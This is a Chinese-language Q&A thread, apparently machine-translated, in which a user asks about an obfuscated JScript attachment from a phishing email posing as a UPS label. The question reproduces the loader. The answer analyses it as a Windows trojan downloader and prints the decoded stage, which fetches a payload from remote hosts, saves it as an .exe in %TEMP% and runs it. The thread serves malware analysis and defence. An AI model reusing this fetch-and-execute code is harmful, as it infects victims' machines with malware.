电子邮件与UPS标签脚本它做了什么？

Question

我得到了电子邮件今天有人给我发了一个UPS标签我没有打开它，因为我发现它可疑我想知道这是什么代码做，

感谢

var sder = "P"; 
 
var g2 = "M"+"sxml2.XMLHT"+""+"T"+""+sder; 
 

 
var m = "LZUaj4-qfCYW4M3kjDIgGL844Arvxk8a-hL2LmwUe1fG4_p62GL1yQkO5QZj62RgjWMzKm3mojn5OZRDSmV0C9O7RF_9Lw"; 
 

 
var x = new Array("site link", "site link", "site link", "site link", "site link"); 
 
var t4 = "ht"+"tp"; 
 

 
var mul = "qwadro"; 
 
var ter = "/"; 
 
for (var i=0; i<x.length; i++) 
 
{ \t 
 
\t var vDJmB = function(){ 
 
\t \t return new ActiveXObject(g2); 
 
\t }(); 
 
\t var e = vDJmB; 
 

 
\t try 
 
\t { 
 
\t \t e.open("G"+"E"+"T", t4 + ":"+ter+ter+x[i]+"/c"+"o"+"unter/?"+m, false); 
 
\t \t e.send(); 
 

 
\t \t var r = e.responseText; 
 

 
\t \t if (r.length > 999+1 && r.indexOf(m) > -1) 
 
\t \t { 
 
\t \t \t eval(e.responseText.split(m).join(mul.substring(2,3))); 
 

 
\t \t \t break; 
 
\t \t }; 
 
\t } 
 
\t catch(e) 
 
\t { 
 
\t }; 
 
};

我想知道这段代码做什么，有人试图从我那里获取信息？谢谢

Answer 1

这是一个专门针对Microsoft Windows的特洛伊木马加载程序。它将一个指针e创建为一个Msxml2.XMLHTTP activeX对象，vDJmB。

然后它使用密钥m对数组x中的站点进行排序，以获得多部分编码的明文有效载荷组件r。该组件有效负载被解码为一个JavaScript字符串，然后进行评估。每个组件元素的长度介于5972和6266之间。在我的版本中有五个组件。

实际有效负载在解码和评估时会引用其他几个网站，创建多个对象，创建一个扩展名为.doc的随机字符文件，尝试运行它，然后将错误捕获到空处理程序中，然后下载png，重命名为exe然后运行它...非常复杂的混淆，我会说。它最终会抓住什么？不能告诉你，因为我没有Windows系统。

第一部分做如下（有在不同的站点名称矿井这些组件五）：

var ld = 0; 
var cs = String.fromCharCode(92); 
var ll = [ "seperate_site2.com", "site_in_original4.com", "site_in_original4", "seperate_site2", "site_in_original1.com" ]; 
var ws = WScript.CreateObject("WScript.Shell"); 
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a"; 
var xo = WScript.CreateObject("Msxml2.XMLHTTP"); 
var xa = WScript.CreateObject("ADODB.Stream"); 
var fo = WScript.CreateObject("Scripting.FileSystemObject"); 
if (!fo.FileExists(fn + ".doc")) { 
    var fp = fo.CreateTextFile(fn + ".doc", true); 
    for (var i = 0; i < 8339; i++) { 
    fp.Write(String.fromCharCode(Math.floor(Math.random() * 64 + 20))); 
    }; 
    fp.Close(); 
    try {ws.Run(fn + ".doc", 1, 0);} catch (er) {}; 
    for (var n = 1; n <= 2; n++) { 
    for (var i = ld; i < ll.length; i++) { 
     var dn = 0; 
     try { 
     xo.open("GET", "http://" + ll[ i ] + "/counter/?" + n, false); 
     xo.send(); 
     if (xo.status == 200) { 
      xa.open(); 
      xa.type = 1; 
      xa.write(xo.responseBody); 
      if (xa.size > 10000) { 
      dn = 1; 
      xa.saveToFile(fn + n + ".exe", 2); 
      try {ws.Run(fn + n + ".exe", 1, 0);} catch (er) {}; 
      }; 
      xa.close(); 
     }; 
     if (dn == 1) { 
      ld = i; 
      break; 
     }; 
     } catch (er) {}; 
    }; 
    }; 
} else { 
    try {ws.Run(fn + ".doc", 1, 0);} catch (er) {}; 
}; 

我用犀牛调试器和Eclipse在Ubuntu 16.04，以评估该装载机。